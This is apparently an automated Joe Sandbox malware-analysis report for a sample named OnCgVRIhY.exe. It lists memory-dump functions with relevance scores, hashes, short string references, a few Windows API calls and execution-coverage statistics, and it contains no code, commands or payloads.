GetModuleHandleW.KERNELBASE(00000000), ref: 02B9B2FE

Memory Dump Source

Source File: 0000000A.00000002.2131378915.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b90000_OnCgVRIhY.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8ca35d91b2304c4a6e73762a3eec938610dd97cdc5059fcd667dc2fe1053cf85
Instruction ID: 9649b50cf1dbeadd4fc71f5ad9ee168e6231059fb004f8de807ce777b67a1b37
Opcode Fuzzy Hash: 8ca35d91b2304c4a6e73762a3eec938610dd97cdc5059fcd667dc2fe1053cf85
Instruction Fuzzy Hash: F211E0B6C007498FDB10CF9AD944ADEFBF8EF88328F14846AD419A7210D375A545CFA5

Function 012DD1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2130867839.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12dd000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb1a5ea11cb6cacefb3a20361a9a6cc1a14b0cc7f90bb4839e74197497619ac1
Instruction ID: fd22f3647b097b6c08556f9703aaf5fb056e664d773c79e1d11e420748a79ab2
Opcode Fuzzy Hash: bb1a5ea11cb6cacefb3a20361a9a6cc1a14b0cc7f90bb4839e74197497619ac1
Instruction Fuzzy Hash: B1210372514608DFDB06DF98D9C8B2ABF65FB88320F24C569E9090B287C376D416CBA1

Function 012DD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2130867839.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12dd000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5961079f6bd6ef3973f387289264232f73ec7b86c7c8a86ad09891321ab3a8cf
Instruction ID: a0523693429a6bb5eaf20f96bc7ca35f7e85ad26eeb35f7cf4d7398131bfcdbf
Opcode Fuzzy Hash: 5961079f6bd6ef3973f387289264232f73ec7b86c7c8a86ad09891321ab3a8cf
Instruction Fuzzy Hash: D8214571514648DFCB12DF98E9C0B26BF65FB88328F60C569E9090B286C336E406CBA1

Function 012ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2130935096.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12ed000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581531d58c3d29358af701eb840ea0cd958c4c600f6a6f6965b751428022b766
Instruction ID: c11bdfc5cba6a7d9eafa2e4422f0886d78b5cec97c39858fa3d774830fffd7f3
Opcode Fuzzy Hash: 581531d58c3d29358af701eb840ea0cd958c4c600f6a6f6965b751428022b766
Instruction Fuzzy Hash: 9C213775514208DFCB15DF58D9C8B16BFA5FB84314F68C96DD9090B246C37BD407CA61

Function 012DD1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2130867839.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12dd000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
Instruction ID: f579df7259e9496dc4b7b5cd3d91a3ba2fd32e9c7d1f03122c1c221a5e0c9268
Opcode Fuzzy Hash: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
Instruction Fuzzy Hash: E721CD76404645CFDB06CF54D9C8B16BF72FB84320F24C1AADD080A69BC33AD42ACBA1

Function 012DD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2130867839.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12dd000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: e5ad2fec9c8c87e6d8110ec7242cb37ac3f0fd3145caa5720a7c7526f76ffcd2
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: AB112676404285CFCB12CF54D5C4B16BF71FB84324F24C6A9D9090B257C33AD45ACBA1

Function 012ED017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2130935096.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12ed000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction ID: fc58f55c54dc593f06dc8a6c6b279f730326e0031df763ecb33d1242c2a73d7e
Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction Fuzzy Hash: AE11BB75504284CFDB12CF58D5C8B16BFA2FB84314F28C6AAD9094B656C33AD40ACBA2

Function 012DD731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2130867839.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12dd000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98667e77d7e5d46774c3ae4f0a2516b3d76416615f3f846a8891f9009024d70d
Instruction ID: 763bcb26d43c23c16f1b8cf5168a755f3dcc1560c9220a118d515f959533441f
Opcode Fuzzy Hash: 98667e77d7e5d46774c3ae4f0a2516b3d76416615f3f846a8891f9009024d70d
Instruction Fuzzy Hash: 1101DB71114B899BF7158B69CDC4766FF98EF41334F18C499EE094B1C3D2B99840C6B1

Function 012DD730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2130867839.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12dd000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aafcd057320f5f49da1380fb2706c837383b56287fc724d5e6240567276e3e49
Instruction ID: 4d15386e65de8c551e7692b3f03b3202bc5ba21abbe5b50d93e28f0e15f32150
Opcode Fuzzy Hash: aafcd057320f5f49da1380fb2706c837383b56287fc724d5e6240567276e3e49
Instruction Fuzzy Hash: 0EF062724047849BF7158A19DD84B66FF98EB91734F18C55AEE084B2C6C2799844CAB1

Analysis Process: OnCgVRIhY.exePID: 7732, Parent PID: 7472COMMON

Execution Graph

Execution Coverage:	18.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	18.4%
Total number of Nodes:	38
Total number of Limit Nodes:	9

Executed Functions

Function 014FBFC8 Relevance: 6.6, Strings: 5, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 014FC3F8
LjFp, xrefs: 014FC36F
0oFp, xrefs: 014FC202
PHcq, xrefs: 014FC3E7
LjFp, xrefs: 014FC385

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 34b311f1fdc6619f6d0f48941e91101cce7a1bc9b1554d19217763527f1c29d1
Instruction ID: 996cc644c4e1b0f5a6ce8d273d67ca8bd7d0c13c47add0e6cd4a65a41f8d6a92
Opcode Fuzzy Hash: 34b311f1fdc6619f6d0f48941e91101cce7a1bc9b1554d19217763527f1c29d1
Instruction Fuzzy Hash: 7CE1FA75E00218CFDB15CFA9C984E9EBBB1FF49310F15806AE919AB362D731A881CF50

Function 014FCCD0 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oFp, xrefs: 014FCD42
PHcq, xrefs: 014FCF27
LjFp, xrefs: 014FCEAF
PHcq, xrefs: 014FCF38
LjFp, xrefs: 014FCEC5

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 28771dee85b2c2697e1f994c462d14b81853abd412506b43195b5e262e5fcca5
Instruction ID: e7b62ad4d31b6122642bf379addcf146b54f3badde2826d512d6e71dea867c61
Opcode Fuzzy Hash: 28771dee85b2c2697e1f994c462d14b81853abd412506b43195b5e262e5fcca5
Instruction Fuzzy Hash: D181A574E01258DFDB14DFAAD984A9EBBF2BF88310F14C06AD519AB365DB309941CF50

Function 014F5371 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjFp, xrefs: 014F5566
0oFp, xrefs: 014F53E2
PHcq, xrefs: 014F55D9
PHcq, xrefs: 014F55C8
LjFp, xrefs: 014F5550

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 137aac376d511eed6e40e6e447cb7656f2baa228896db3fa34ae6667fd15d654
Instruction ID: 3690ad3358a1c94bcc09b93fc6b34c9135a493f02a68a88966f3c5b53e426fc9
Opcode Fuzzy Hash: 137aac376d511eed6e40e6e447cb7656f2baa228896db3fa34ae6667fd15d654
Instruction Fuzzy Hash: 6C819574E00218DFDB14DFAAD984A9EBBF2BF88300F14D06AD919AB365DB349945CF50

Function 014FD271 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 014FD4D8
LjFp, xrefs: 014FD44F
0oFp, xrefs: 014FD2E2
PHcq, xrefs: 014FD4C7
LjFp, xrefs: 014FD465

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 05fab6f2c00418f5db3c3cd86945763d4c9136b691a5fa5d69f1b2108744c31e
Instruction ID: d0d971e697349e4fa84ea56e4871e72f9a54f5d336fbb10b92e1ed98d4b06b55
Opcode Fuzzy Hash: 05fab6f2c00418f5db3c3cd86945763d4c9136b691a5fa5d69f1b2108744c31e
Instruction Fuzzy Hash: 4281A574E00218DFDB14DFAAD944A9DBBF2BF89300F14C06AE919AB365DB349941CF50

Function 014FC460 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjFp, xrefs: 014FC63F
0oFp, xrefs: 014FC4D2
PHcq, xrefs: 014FC6B7
LjFp, xrefs: 014FC655
PHcq, xrefs: 014FC6C8

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: f05c86ae25aa11fe50c4799c6fb78046a6f9abe886db8f8358e386fea06a175c
Instruction ID: 9603cf541ece9d5f775a9c025abed52cec6c954bcd82d813c01f806f8552dfaf
Opcode Fuzzy Hash: f05c86ae25aa11fe50c4799c6fb78046a6f9abe886db8f8358e386fea06a175c
Instruction Fuzzy Hash: 0581C674E04218CFEB14DFA9D984A9EBBF2BF88300F14D06AD519AB365DB349945CF50

Function 014FCFA1 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 014FD208
LjFp, xrefs: 014FD17F
LjFp, xrefs: 014FD195
0oFp, xrefs: 014FD012
PHcq, xrefs: 014FD1F7

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 24577c002e9228d130f01d9dd4f200980b7cda87bc26fdf779a2c0a1b8a488e6
Instruction ID: af640bde1c8186e7ac1e5e641f19f526a625c1e12334e1a6bf85b48115def887
Opcode Fuzzy Hash: 24577c002e9228d130f01d9dd4f200980b7cda87bc26fdf779a2c0a1b8a488e6
Instruction Fuzzy Hash: 2A81B774E00218DFDB14DFAAD944A9EBBF2BF89310F14C06AE519AB365DB349941CF50

Function 014FC730 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 014FC987
LjFp, xrefs: 014FC90F
LjFp, xrefs: 014FC925
PHcq, xrefs: 014FC998
0oFp, xrefs: 014FC7A2

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: db3ebe666b04ef0c4c66411fe1d290a8324a48ed0d90346c672644c9db55dcc6
Instruction ID: ce639ff9376dbfc43d8ede6461be982caef6dfe7456b98251cf7ca218dcd5d92
Opcode Fuzzy Hash: db3ebe666b04ef0c4c66411fe1d290a8324a48ed0d90346c672644c9db55dcc6
Instruction Fuzzy Hash: 0681A474E00218DFDB14DFAAD984A9EBBF2BF88310F14C06AE519AB365DB349941CF50

Function 014FCA00 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 014FCC68
PHcq, xrefs: 014FCC57
LjFp, xrefs: 014FCBF5
LjFp, xrefs: 014FCBDF
0oFp, xrefs: 014FCA72

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 88bdae679671b61753076eb236e495305a480b19af2e6c1cefe057008664a95d
Instruction ID: d522411bf0c69757a4140fa27731d48ed5532920b0cdf1f9bfc61b8c13e5d1f5
Opcode Fuzzy Hash: 88bdae679671b61753076eb236e495305a480b19af2e6c1cefe057008664a95d
Instruction Fuzzy Hash: 45818374E0021C9FDB14DFAAD984A9EBBF2BF88310F14C06AD919AB365DB349945CF50

Function 014F7920 Relevance: 5.4, Strings: 4, Instructions: 385
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(ocq, xrefs: 014F7A28
,gq, xrefs: 014F7A92
,gq, xrefs: 014F7AA0
(ocq, xrefs: 014F7A1A

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$,gq$,gq
API String ID: 0-2401767512
Opcode ID: 06bf870b039392c2622d936e56cb35411e225ce7abebca45160f7db332d589de
Instruction ID: f722ea745492a9fd8fce6f0995df61dcdd24363355e36aa6e0ef1242e75dd6af
Opcode Fuzzy Hash: 06bf870b039392c2622d936e56cb35411e225ce7abebca45160f7db332d589de
Instruction Fuzzy Hash: 36F14D31A00109CFDB15CF69C884AAEBBB6FF49352F55846AE605AB3B5D738DC42CB50

Function 014F29EC Relevance: 5.3, Strings: 4, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xgq, xrefs: 014F2BA4
Xgq, xrefs: 014F2A9E
Xgq, xrefs: 014F2AD8
Xgq, xrefs: 014F2B57

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: Xgq$Xgq$Xgq$Xgq
API String ID: 0-1951159037
Opcode ID: 9bb06eccb0d7d7a9ed3316290f33fa47192336c7762bde9a63b9dcffb68811f1
Instruction ID: 4122a1cd7f0f5ea039eb193f63b716e1cd624897c6d80c91eab2b2c326b93aa3
Opcode Fuzzy Hash: 9bb06eccb0d7d7a9ed3316290f33fa47192336c7762bde9a63b9dcffb68811f1
Instruction Fuzzy Hash: 7CB1E030E04729CBCBA18F6885547AEBBB1FF84324F11496EC6896B361D770DD85CB92

Function 014FA488 Relevance: 3.4, Strings: 2, Instructions: 897COMMON

Download Yara Rule

Strings

4'cq, xrefs: 014FAF13
(ocq, xrefs: 014FA918

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: (ocq$4'cq
API String ID: 0-3004416391
Opcode ID: 61252f686b55b694ebd95ff2c48b6aa059f3f3cc7a599c9a6adb48612b9e59cd
Instruction ID: 0a8d83c9f73944de7ad82a0fb975fdfaa78438bf0000d69de53c3905b9d00ca7
Opcode Fuzzy Hash: 61252f686b55b694ebd95ff2c48b6aa059f3f3cc7a599c9a6adb48612b9e59cd
Instruction Fuzzy Hash: 8F828474A00209DFCB15CF68C584AAEBBF2FF88310F25855AE6199B3B1D734E995CB50

Function 06BF8CC8 Relevance: 3.4, APIs: 2, Instructions: 357libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06BF8D60

Memory Dump Source

Source File: 0000000E.00000002.4527357888.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6bf0000_OnCgVRIhY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e68fc0e9a1f069e46523cae7fb8afe1bcb544f310988ed7beddce93f582aa8d
Instruction ID: 88c694c1fb4a14a3db68b15144afe0a62b8eba608d96ecd38bff81e7f059492b
Opcode Fuzzy Hash: 7e68fc0e9a1f069e46523cae7fb8afe1bcb544f310988ed7beddce93f582aa8d
Instruction Fuzzy Hash: EBF1E5B4E11218CFDB54DFA9C884B9DFBB2BF88304F1481A9E508AB365DB749985CF50

Function 014F71A9 Relevance: 3.0, Strings: 2, Instructions: 508COMMON

Download Yara Rule

Strings

Hgq, xrefs: 014F75AE
(ocq, xrefs: 014F76E2

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: (ocq$Hgq
API String ID: 0-2239030825
Opcode ID: a4b4d42d089487d4bb002e8d89df5c0c70f7f5171f3a54e7ad4b97711053ae65
Instruction ID: b00185f130fd9476622e4d5a96546d56dca1f603c811aa4e09f0426f852fc7de
Opcode Fuzzy Hash: a4b4d42d089487d4bb002e8d89df5c0c70f7f5171f3a54e7ad4b97711053ae65
Instruction Fuzzy Hash: 17129F70A002199FDB14DF69C854AAEBBF6FF88341F10856EEA05DB3A1DB349D41CB90

Function 06BF8AA8 Relevance: 1.8, APIs: 1, Instructions: 258libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06BF8D60

Memory Dump Source

Source File: 0000000E.00000002.4527357888.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6bf0000_OnCgVRIhY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2e81e0249117e655dbadd78277a3d6fe46bf3956b0a0621bfac795842eaf08f
Instruction ID: 8d4250aac6108acf2059dfd54cd7766d161a560cde3a4402d7b4c67e30f355e8
Opcode Fuzzy Hash: b2e81e0249117e655dbadd78277a3d6fe46bf3956b0a0621bfac795842eaf08f
Instruction Fuzzy Hash: B791C3F1E106198FDB54DFB9C9406AEBBF2AF89310F1489AAC505B73A1DB314D09CB90

Function 014FEBFA Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc1e7038555a8570ac667806ef3b09036020044f39650800000ccfea2bc8f521
Instruction ID: 9c9196b5dff38bc1e0907cb41bc0eee3fee02f2251edf8e96624d8eed2b06abd
Opcode Fuzzy Hash: cc1e7038555a8570ac667806ef3b09036020044f39650800000ccfea2bc8f521
Instruction Fuzzy Hash: FF51B774E01208DFDB19DFAAD554A9EBBB2FF89300F24802AE915AB365DB305942CF10

Function 014FEC08 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed5db10c9e1e9a5f13d49c1ac3a61441cfdaf32b4403ff6db59c487b6b71312
Instruction ID: 626d81fc0f8f1dc08a50e10cfab4b1876b4c37d43a455f19f649bdb54c8929ff
Opcode Fuzzy Hash: 4ed5db10c9e1e9a5f13d49c1ac3a61441cfdaf32b4403ff6db59c487b6b71312
Instruction Fuzzy Hash: 9F51A674E00208DFDB19DFAAD554A9EBBB2FF89300F24802AE915AB365DB305942CF10

Function 014FD540 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae04592a4d89e263a4192670d0dce865690121cc21bd9a978a4fa44fea88adce
Instruction ID: 6bb66cd9118ac5703e514da97d1b045ed7b13365ef595e066465c4362f7f0580
Opcode Fuzzy Hash: ae04592a4d89e263a4192670d0dce865690121cc21bd9a978a4fa44fea88adce
Instruction Fuzzy Hash: 4D518274E012089FDB54DFA9D5849DDBBF2BF89310F24816AE919AB364DB30A905CF40

Function 014F7EF8 Relevance: 10.5, Strings: 8, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(ocq, xrefs: 014F8417
(ocq, xrefs: 014F8407
(ocq, xrefs: 014F7FF1
(ocq, xrefs: 014F80BA
,gq, xrefs: 014F8398
,gq, xrefs: 014F83A8
(ocq, xrefs: 014F7F36
(ocq, xrefs: 014F801D

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
API String ID: 0-3338910979
Opcode ID: b595531d35a537fc5ccf86010078d8017d6dd8508fb4559831b52643646072ba
Instruction ID: 43d25f0011de3e643a994b4023ac7e4ad71293c7ed24c090559df3d655358793
Opcode Fuzzy Hash: b595531d35a537fc5ccf86010078d8017d6dd8508fb4559831b52643646072ba
Instruction Fuzzy Hash: DA124930A0060A8FCB15CF69D984AAEBBF2FF89314F55855AE6059B3B2D731ED41CB50

Function 014F92F8 Relevance: 5.3, Strings: 4, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'cq, xrefs: 014F94B1
4'cq, xrefs: 014F94D7
$cq, xrefs: 014F93D7
$cq, xrefs: 014F93B4

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$$cq$$cq
API String ID: 0-1126079151
Opcode ID: 69286d4f897015b4e9b64c3535e3bf416fd9d23afba1576c2c5268aa91a20690
Instruction ID: c64975fac013ade2d6e8f435ed2a18c9e1051b9992101d76589de20b0cd563a3
Opcode Fuzzy Hash: 69286d4f897015b4e9b64c3535e3bf416fd9d23afba1576c2c5268aa91a20690
Instruction Fuzzy Hash: 839140307006128FD7269B2DD854B2E7BA5EF85658B15446FF206CF3B2EB35CC428B92

Function 014F6338 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

Hgq, xrefs: 014F6456
Hgq, xrefs: 014F6423

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: Hgq$Hgq
API String ID: 0-3391890871
Opcode ID: 5cb913e59ca2e8c4ee26bcc279cf46f160c416a2cb3036f92f98c5c5e4654eab
Instruction ID: 3cc713877aebcfb4a41d1ce60934af39ea16e82a06986743ca8654b16f764a54
Opcode Fuzzy Hash: 5cb913e59ca2e8c4ee26bcc279cf46f160c416a2cb3036f92f98c5c5e4654eab
Instruction Fuzzy Hash: F9B190707042158FDB269F38D854B7F7BA2AF89340F16456EEA06CB3A5DB34C846CB91

Function 014F6898 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

,gq, xrefs: 014F6978
,gq, xrefs: 014F696E

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: ,gq$,gq
API String ID: 0-2533611571
Opcode ID: b52b4c3ec1b2b5c63df655ed1739dbb855937059fbd98fd57c75a4c76bc81ebb
Instruction ID: b0bd529e72ce8c6fe8a35aa56ab53d95eee251eb21ca0ec8995e25dddacaffbc
Opcode Fuzzy Hash: b52b4c3ec1b2b5c63df655ed1739dbb855937059fbd98fd57c75a4c76bc81ebb
Instruction Fuzzy Hash: BE817E30B005058FDB14DF6EC884AAABBB6FF8A210B16816ED616D73B5DB31EC45CB51

Function 014FA030 Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

4'cq, xrefs: 014FA16D
4'cq, xrefs: 014FA184

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq
API String ID: 0-60795322
Opcode ID: e4718cb02204a59c9051c768fc5f4a2e407e8043fcb1d66ab91cc167a9d7afb6
Instruction ID: d20c4e60365db37c4d230c7de71057eb307762f57d8f2472123bc590a7be0e6b
Opcode Fuzzy Hash: e4718cb02204a59c9051c768fc5f4a2e407e8043fcb1d66ab91cc167a9d7afb6
Instruction Fuzzy Hash: 7951B3307002159FDB11CE69C944B6BBBE6EF89350F15806AEA49CB361D731DC01CB91

